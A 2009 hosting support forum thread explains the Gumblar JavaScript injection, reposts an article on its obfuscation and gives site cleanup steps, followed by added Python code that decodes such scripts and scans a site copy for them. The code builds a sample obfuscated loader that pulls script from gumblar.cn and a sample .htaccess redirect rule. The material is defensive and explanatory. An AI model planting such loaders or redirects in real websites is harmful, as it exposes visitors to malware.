Kiwihosting Support Forum: Gumblar Exploit is the Most Prevalent Web Threat - Kiwihosting Support Forum



Gumblar Exploit is the Most Prevalent Web Threat What you can do to prevent it and how to remove it.

#1 Kiwihost

  • Group: Admin
  • Posts: 2361
  • Joined: 27-October 02

Posted 19 May 2009 - 05:41 AM

We have noticed that there has been an increase in the number of websites exploited over the last few weeks, not only websites hosted by Kiwihosting.net, but in many of the hosting forums we follow there has been a large number of other hosting companies also reporting such increases. The following article explains a little more about the current exploit that's been reported most frequently and what you can do to help protect yourself against it.

Whilst at Kiwihosting.net we do everything possible to help protect our servers against exploits, the vast majority of exploited sites that we investigate are the result of:

1) Customers running third-party software such as Joomla, phpBB, vBulletin, etc. and not keeping up to date with new releases
2) Customers having FTP passwords that are weak and easily guessed or brute-forced
3) Customer computers infected with malware/keyloggers or trojans.

For those customers who have not yet moved their sites to our HELM servers, we highly encourage you to consider doing so; we run additional software on these servers that helps us to dramatically reduce the attack vectors on the server by blocking any suspicious request or URL received.

We recommend all customers consider running software such as Malwarebytes, and AVAST Anti-virus to help protect your own computers against such intrusions.

http://malwarebytes.org/
http://www.avast.com/

Quote

Malware analysts from security vendor Sophos warn that the number of pages infected with the Gumblar malicious script has recently sky-rocketed, putting the exploit at the top of the list of Web threats. The impact of the previous record setter, Mal/Iframe-F, is now dwarfed in comparison.

According to Sophos, Troj/JSRedir-R, otherwise known as the Gumblar exploit, after the rogue domain it points to, amounts to a whopping 42% of all infections on the Web today. Mal/Iframe-F occupies the second place, its number of infections being six times lower and accounting for only 7%.

"Typically, JSRedir-R is found on legitimate websites, hidden behind obfuscated Javascript, loading malicious content from third-party sites without the user's knowledge. In the below case, the obfuscated script tries to download dangerous code from a site called gumblar.cn," Graham Cluley, Sophos' senior technology consultant, explains.

The obfuscation method used by Gumblar is fairly simple and involves replacing characters with their hexadecimal value, for example "%20" instead of a space, then replacing the % with an arbitrary character. The Javascript code includes a replace function at the end, which restores the % in place of the random character.

There are numerous variations of this script in the wild and they can usually be found right before the "body" tag in compromised HTML documents. They all query gumblar.cn, which is blacklisted by Google, for additional malicious scripts. "Unlike the recent iframe exploits, where the malicious code was only injected into files with the most common filenames (e.g. index.html, index.php, etc.), this gumblar script is injected into every web page," the Unmask Parasites blog warns.

Since this script has been found on websites running a variety of PHP applications, it cannot be tied to a particular vulnerability. Instead, compromised FTP credentials might be the point of entry. Paul Baccas, virus researcher at Sophos, attributes the infections to the PHPMod-A Trojan. The payload is also said to change permissions of various directories on the webserver and drop an image.php file into the 'images' folder.

What is also interesting is that the exploit infects different file types with different code. This means that the code inserted into .js files will be different from the one inserted into .php. This is, obviously, required for the malicious code to be executed properly, but the fact that it successfully targets more than .html files makes the threat a lot more dangerous and hard to clean.

If you have reasons to believe that your website has been compromised by this threat, make sure your computer is clean of malware, change the password for your FTP accounts and re-upload the website from a clean back-up.


Reposted From: http://news.softpedi...at-111701.shtml
Kiwihosting.net Ltd
NZ Web Hosting Specialists
http://www.kiwihosting.net.nz
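The obfuscation the quoted article describes, worked through as an added example (this is not code from the post, from Sophos or from Softpedia): a script in that shape is constructed, the marker character is recovered from the trailing replace() call, and the hidden payload and the host it points at are extracted. The payload text and the marker character are assumptions made for the constructed sample; the only domain used is the gumblar.cn the article names.

```python
"""Decode the Gumblar-style obfuscation described in the article above.

Added example, not code from the forum post or from Sophos/Softpedia.
The scheme as described: every character becomes its %xx hex escape,
the '%' is swapped for an arbitrary marker character, and a
.replace(/marker/g, "%") call at the end restores it before unescape()
and eval() run the result.  The sample script below is constructed to
mimic that shape; it is not a captured Gumblar sample.
"""
import re
from typing import List, Optional
from urllib.parse import unquote


def obfuscate(plaintext: str, marker: str) -> str:
    """Build a blob the way the article describes.  Used here only to
    construct the sample; a real blob would come from an infected page."""
    if marker == "%" or marker.lower() in "0123456789abcdef":
        raise ValueError("marker must not collide with the hex escapes")
    hexed = "".join("%%%02x" % b for b in plaintext.encode("utf-8"))
    return hexed.replace("%", marker)


# Constructed payload (assumption): pull a script from the domain the article names.
PAYLOAD = 'document.write(\'<script src="http://gumblar.cn/"></script>\');'
MARKER = "@"  # assumption: any non-hex, non-'%' character works
SAMPLE_SCRIPT = (
    '<script>var s="' + obfuscate(PAYLOAD, MARKER) + '";'
    'eval(unescape(s.replace(/' + MARKER + '/g,"%")));</script>'
)

# The tell-tale restore call: .replace(/X/g, "%") where X is one character,
# possibly backslash-escaped in the regex literal (e.g. /\$/g).
RESTORE_CALL = re.compile(r'\.replace\(\s*/(\\?.)/g\s*,\s*["\']%["\']\s*\)')


def find_marker(script: str) -> Optional[str]:
    """Recover the character that stands in for '%' or None if absent."""
    m = RESTORE_CALL.search(script)
    if not m:
        return None
    marker = m.group(1)
    return marker[1] if marker.startswith("\\") else marker


def decode(script: str) -> Optional[str]:
    """Return the hidden plaintext, or None if the pattern is not present."""
    marker = find_marker(script)
    if marker is None:
        return None
    # The blob is a quoted string made only of the marker and hex digits;
    # take the longest one in case the page has other hex-looking strings.
    blob_re = re.compile(r'["\']([' + re.escape(marker) + r'0-9A-Fa-f]{8,})["\']')
    blobs = blob_re.findall(script)
    if not blobs:
        return None
    blob = max(blobs, key=len).replace(marker, "%")
    # JS unescape() also understands %uXXXX; unquote() does not, which is
    # fine for the single-byte escapes this scheme produces.
    return unquote(blob, errors="replace")


def referenced_hosts(script: str) -> List[str]:
    """Hosts the decoded payload points at: what you blocklist and grep for."""
    decoded = decode(script)
    if decoded is None:
        return []
    return sorted(set(re.findall(r"https?://([A-Za-z0-9.-]+)", decoded)))


if __name__ == "__main__":
    print(SAMPLE_SCRIPT)
    print(decode(SAMPLE_SCRIPT))
    print(referenced_hosts(SAMPLE_SCRIPT))
```

The decoder keys on the restore call rather than on a fixed marker, so it copes with the "numerous variations" the article mentions as long as they keep the replace-then-unescape shape; a variant that restores the % some other way needs its own handling.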

#2 Kiwihost

  • Group: Admin
  • Posts: 2361
  • Joined: 27-October 02

Posted 19 May 2009 - 06:09 AM

If you have been infected by the above or similar exploits, the best way to clean your website(s) is to delete all of your website(s) files and re-upload your site from the clean copy that you should be maintaining on your local development machine, a practice that every good developer should employ.

WARNING: You MUST change ALL CONTROL PANEL, FTP and FTP SUB-ACCOUNT PASSWORDS!
We have talked with many customers who have spent hours cleaning their website(s) and did NOT change their passwords; these customers became infected again, sometimes within just a matter of hours.

1) Login to your H-Sphere or HELM Control Panel.

2) Click on the File Manager icon. A new window called WebShell will open (HSphere) or File Manager (HELM) and reveal to you a list of the files within your domain (HELM) or all domains under your account (HSphere).

Before proceeding further, please ensure you have a CURRENT BACKUP of your website saved from before the exploit occurred.

3) Now, start with the first website directory on the list, navigate into it and delete EVERYTHING!

When deleting files there are some folders you may not be able to delete. They are:

aspnet_client/
AWStats/
webalizer/

The aspnet_client folder in most cases will NOT allow you to delete it. This is a system folder that is locked by the server. In most cases, you can delete the FILE contents of this folder and its sub-folders but you will not be able to delete the folder itself.

AWStats and webalizer are folders that contain your website traffic statistics. Please review the files within them for evidence of infections. We highly recommend that you review your stats and then turn off the stats services in the control panel and then delete the folders to be 100% certain about having removed all infected files. You can then turn them back on and your stats will start tracking with a clean slate.

Work on only one website at a time! Once you have successfully deleted every file and folder for a particular website, begin uploading your back-up copy to the server. When all of the files are back on the server, your website should be free of infection and secure behind your new STRONG passwords!

If you have more than one website, move on to the next one.

Other tools you may find useful are SmartFTP, an excellent but now commercial FTP program, or WS_FTP, a completely free FTP program. Both of these programs allow you to search for files within your folders and assist in deleting them.

To date we have discovered the following pattern to the exploits occurring:
.htaccess files are uploaded to the root folder and most subfolders; these .htaccess files only work on our HSphere Unix servers and cause your site to redirect to bogus websites. Delete all .htaccess files you find unless you know you have a specific requirement for one, in which case check the existing ones and remove any content that you did not place there yourself.

Default index pages are generally the only pages being injected with the exploit; however, we have found some javascript (.js) files also being injected, so it's worth checking these also. Default index pages are usually called one of index.php, index.htm, index.html, default.htm, default.html, index.asp, default.asp, index.aspx or default.aspx, depending on the scripting language used on your site. Check each of these for signs of the exploit and remove the script wherever it's located.

An example of the script you may find being injected into your websites is detailed on the following website: http://blog.unmaskpa...comment-page-1/ ; this page also contains some other useful removal instructions.
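The checks in the post above (.htaccess files in the root and every subfolder, default index pages and .js files carrying the injected script, a script block sitting right before "body"), as an added example that is not a Kiwihosting tool and not part of the original post. It assumes the site has been downloaded to a local folder with an FTP client or the control-panel file manager, and it builds a small constructed tree so it runs offline; the file contents in that tree, including the redirect rule and the bogus.example domain, are invented for illustration.

```python
"""Scan a local copy of a site for the artifacts the post describes.

Added example, not a tool from Kiwihosting or from the original post.
It reports:
  * every .htaccess file, in the root and all subfolders,
  * every default index page or .js file that carries the
    .replace(/X/g,"%") restore call, a reference to gumblar.cn, or an
    inline <script> immediately before <body>.
The sample tree is constructed below (invented contents) so the script
runs offline.
"""
import os
import re
import tempfile
from typing import Dict, List

# Default index names listed in the post.
INDEX_NAMES = {
    "index.php", "index.htm", "index.html", "default.htm", "default.html",
    "index.asp", "default.asp", "index.aspx", "default.aspx",
}
# The .replace(/X/g, "%") call that restores the '%' before unescape().
RESTORE_CALL = re.compile(r'\.replace\(\s*/\\?./g\s*,\s*["\']%["\']\s*\)')
# The domain the quoted article says the injected scripts query.
KNOWN_DOMAIN = re.compile(r"gumblar\.cn", re.IGNORECASE)
# An inline script right before <body>, where the article says it usually sits.
SCRIPT_BEFORE_BODY = re.compile(r"<script\b[^>]*>.*?</script>\s*<body\b",
                                re.DOTALL | re.IGNORECASE)


def looks_injected(text: str) -> bool:
    """True if the file content shows any of the three indicators."""
    return bool(RESTORE_CALL.search(text) or KNOWN_DOMAIN.search(text)
                or SCRIPT_BEFORE_BODY.search(text))


def scan_site(root: str) -> Dict[str, List[str]]:
    """Walk a local copy of the site; return relative paths (forward slashes)
    of every .htaccess file and of every index page or .js file that looks injected."""
    findings: Dict[str, List[str]] = {"htaccess": [], "injected": []}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            if name == ".htaccess":
                findings["htaccess"].append(rel)
                continue
            lower = name.lower()
            if lower not in INDEX_NAMES and not lower.endswith(".js"):
                continue  # the post says other pages are generally untouched
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                if looks_injected(fh.read()):
                    findings["injected"].append(rel)
    for key in findings:
        findings[key].sort()
    return findings


def build_sample_site() -> str:
    """Constructed sample tree (invented contents) mirroring the pattern in the post."""
    root = tempfile.mkdtemp(prefix="site-")
    redirect = "RewriteEngine On\nRewriteRule ^(.*)$ http://bogus.example/ [R,L]\n"
    files = {
        ".htaccess": redirect,          # dropped in the root ...
        "images/.htaccess": redirect,   # ... and in subfolders
        # index page with an obfuscated script block right before <body>
        "index.html": ('<html><head></head><script>var s="@61";'
                       'eval(unescape(s.replace(/@/g,"%")));</script><body>home</body></html>'),
        # .js file with the same restore call appended
        "js/menu.js": 'function menu(){}\neval(unescape("@61".replace(/@/g,"%")));\n',
        "js/clean.js": "function nav(){}\n",
        "default.aspx": "<html><body>clean</body></html>\n",
        "about.html": "<html><body>clean</body></html>\n",
    }
    for rel, content in files.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for kind, paths in scan_site(build_sample_site()).items():
        print(kind, paths)
```

Run it over both the downloaded live site (to see what was touched) and the local backup you intend to re-upload: if the backup flags anything, it is not the clean copy the post asks for, and uploading it only reinfects the site.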
